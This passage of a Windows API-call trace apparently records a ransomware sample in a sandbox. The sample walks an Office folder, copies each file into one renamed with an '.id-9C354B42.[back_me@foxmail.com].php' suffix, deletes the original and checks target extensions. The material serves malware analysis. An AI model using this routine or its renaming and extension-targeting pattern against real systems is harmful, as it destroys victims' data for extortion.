(normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.579] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.579] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0255.580] GetLastError () returned 0x0 [0255.580] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x866, lpOverlapped=0x0) returned 1 [0255.581] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x870, lpOverlapped=0x0) returned 1 [0255.582] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.582] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0255.582] SetEndOfFile (hFile=0x318) returned 1 [0255.582] CloseHandle (hObject=0x318) returned 1 [0255.582] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.582] SetEndOfFile (hFile=0x3b4) returned 1 [0255.584] CloseHandle (hObject=0x3b4) returned 1 [0255.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.584] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd")) returned 1 [0255.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.585] lstrlenW (lpString=".doc") returned 4 [0255.585] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString=".docx") returned 5 [0255.585] lstrcmpiW (lpString1=".docx", lpString2="2.VRD") returned -1 [0255.585] lstrlenW (lpString=".pdf") returned 4 [0255.585] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString=".xls") returned 4 [0255.585] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0255.585] lstrlenW (lpString=".xlsx") returned 5 [0255.585] lstrcmpiW (lpString1=".xlsx", lpString2="2.VRD") returned -1 [0255.585] lstrlenW (lpString=".ppt") returned 4 [0255.585] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.585] lstrlenW (lpString=".zip") returned 4 [0255.585] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0255.585] lstrlenW (lpString=".rar") returned 4 [0255.585] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString=".bz2") returned 4 [0255.585] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString=".7z") returned 3 [0255.585] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0255.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.585] lstrlenW (lpString=".dbf") returned 4 [0255.585] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0255.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.585] lstrlenW (lpString=".1cd") returned 4 [0255.585] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString=".jpg") returned 4 [0255.586] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString=".doc") returned 4 [0255.586] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString=".docx") returned 5 [0255.586] lstrcmpiW (lpString1=".docx", lpString2="2.VRD") returned -1 [0255.586] lstrlenW (lpString=".pdf") returned 4 [0255.586] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString=".xls") returned 4 [0255.586] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0255.586] lstrlenW (lpString=".xlsx") returned 5 [0255.586] lstrcmpiW (lpString1=".xlsx", lpString2="2.VRD") returned -1 [0255.586] lstrlenW (lpString=".ppt") returned 4 [0255.586] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString=".zip") returned 4 [0255.586] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0255.586] lstrlenW (lpString=".rar") returned 4 [0255.586] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString=".bz2") returned 4 [0255.586] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString=".7z") returned 3 [0255.586] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString=".dbf") returned 4 [0255.586] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0255.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.586] lstrlenW (lpString=".1cd") returned 4 [0255.586] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0255.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD") returned 60 [0255.587] lstrlenW (lpString=".jpg") returned 4 [0255.587] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0255.587] lstrcmpiW (lpString1=".HXC", lpString2=".php") returned -1 [0255.587] lstrlenW (lpString="OIS_COL.HXC") returned 11 [0255.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.587] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=611) returned 1 [0255.587] CloseHandle (hObject=0x3b4) returned 1 [0255.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc")) returned 0x20 [0255.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.587] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.588] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0255.588] GetLastError () returned 0x0 [0255.588] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x263, lpOverlapped=0x0) returned 1 [0255.589] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x270, lpOverlapped=0x0) returned 1 [0255.589] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.589] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0255.589] SetEndOfFile (hFile=0x318) returned 1 [0255.590] CloseHandle (hObject=0x318) returned 1 [0255.590] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.590] SetEndOfFile (hFile=0x3b4) returned 1 [0255.592] CloseHandle (hObject=0x3b4) returned 1 [0255.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc")) returned 1 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString=".doc") returned 4 [0255.593] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.593] lstrlenW (lpString=".docx") returned 5 [0255.593] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.593] lstrlenW (lpString=".pdf") returned 4 [0255.593] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.593] lstrlenW (lpString=".xls") returned 4 [0255.593] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.593] lstrlenW (lpString=".xlsx") returned 5 [0255.593] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.593] lstrlenW (lpString=".ppt") returned 4 [0255.593] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString=".zip") returned 4 [0255.593] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.593] lstrlenW (lpString=".rar") returned 4 [0255.593] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.593] lstrlenW (lpString=".bz2") returned 4 [0255.593] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.593] lstrlenW (lpString=".7z") returned 3 [0255.593] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString=".dbf") returned 4 [0255.593] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString=".1cd") returned 4 [0255.593] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.593] lstrlenW (lpString=".jpg") returned 4 [0255.594] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString=".doc") returned 4 [0255.594] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.594] lstrlenW (lpString=".docx") returned 5 [0255.594] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.594] lstrlenW (lpString=".pdf") returned 4 [0255.594] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString=".xls") returned 4 [0255.594] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString=".xlsx") returned 5 [0255.594] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.594] lstrlenW (lpString=".ppt") returned 4 [0255.594] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString=".zip") returned 4 [0255.594] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString=".rar") returned 4 [0255.594] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.594] lstrlenW (lpString=".bz2") returned 4 [0255.594] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.594] lstrlenW (lpString=".7z") returned 3 [0255.594] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString=".dbf") returned 4 [0255.594] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString=".1cd") returned 4 [0255.594] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59 [0255.594] lstrlenW (lpString=".jpg") returned 4 [0255.594] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.595] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0255.595] lstrlenW (lpString="OIS_COL.HXT") returned 11 [0255.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.595] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=203) returned 1 [0255.595] CloseHandle (hObject=0x3b4) returned 1 [0255.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt")) returned 0x20 [0255.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.595] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.595] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0255.596] GetLastError () returned 0x0 [0255.596] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xcb, lpOverlapped=0x0) returned 1 [0255.597] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xd0, lpOverlapped=0x0) returned 1 [0255.597] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.597] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0255.597] SetEndOfFile (hFile=0x318) returned 1 [0255.598] CloseHandle (hObject=0x318) returned 1 [0255.598] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.598] SetEndOfFile (hFile=0x3b4) returned 1 [0255.600] CloseHandle (hObject=0x3b4) returned 1 [0255.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.600] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt")) returned 1 [0255.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.601] lstrlenW (lpString=".doc") returned 4 [0255.601] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0255.601] lstrlenW (lpString=".docx") returned 5 [0255.601] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0255.601] lstrlenW (lpString=".pdf") returned 4 [0255.601] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0255.601] lstrlenW (lpString=".xls") returned 4 [0255.601] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0255.601] lstrlenW (lpString=".xlsx") returned 5 [0255.601] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0255.601] lstrlenW (lpString=".ppt") returned 4 [0255.601] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0255.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.601] lstrlenW (lpString=".zip") returned 4 [0255.601] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0255.601] lstrlenW (lpString=".rar") returned 4 [0255.601] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString=".bz2") returned 4 [0255.602] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0255.602] lstrlenW (lpString=".7z") returned 3 [0255.602] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString=".dbf") returned 4 [0255.602] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString=".1cd") returned 4 [0255.602] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString=".jpg") returned 4 [0255.602] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString=".doc") returned 4 [0255.602] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0255.602] lstrlenW (lpString=".docx") returned 5 [0255.602] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0255.602] lstrlenW (lpString=".pdf") returned 4 [0255.602] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString=".xls") returned 4 [0255.602] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString=".xlsx") returned 5 [0255.602] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0255.602] lstrlenW (lpString=".ppt") returned 4 [0255.602] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.602] lstrlenW (lpString=".zip") returned 4 [0255.602] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0255.602] lstrlenW (lpString=".rar") returned 4 [0255.602] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0255.603] lstrlenW (lpString=".bz2") returned 4 [0255.603] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0255.603] lstrlenW (lpString=".7z") returned 3 [0255.603] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0255.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.603] lstrlenW (lpString=".dbf") returned 4 [0255.603] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0255.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.603] lstrlenW (lpString=".1cd") returned 4 [0255.603] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0255.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59 [0255.603] lstrlenW (lpString=".jpg") returned 4 [0255.603] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0255.603] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0255.603] lstrlenW (lpString="OIS_F_COL.HXK") returned 13 [0255.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.603] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=114) returned 1 [0255.603] CloseHandle (hObject=0x3b4) returned 1 [0255.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk")) returned 0x20 [0255.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.604] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.604] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0255.604] GetLastError () returned 0x0 [0255.605] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, 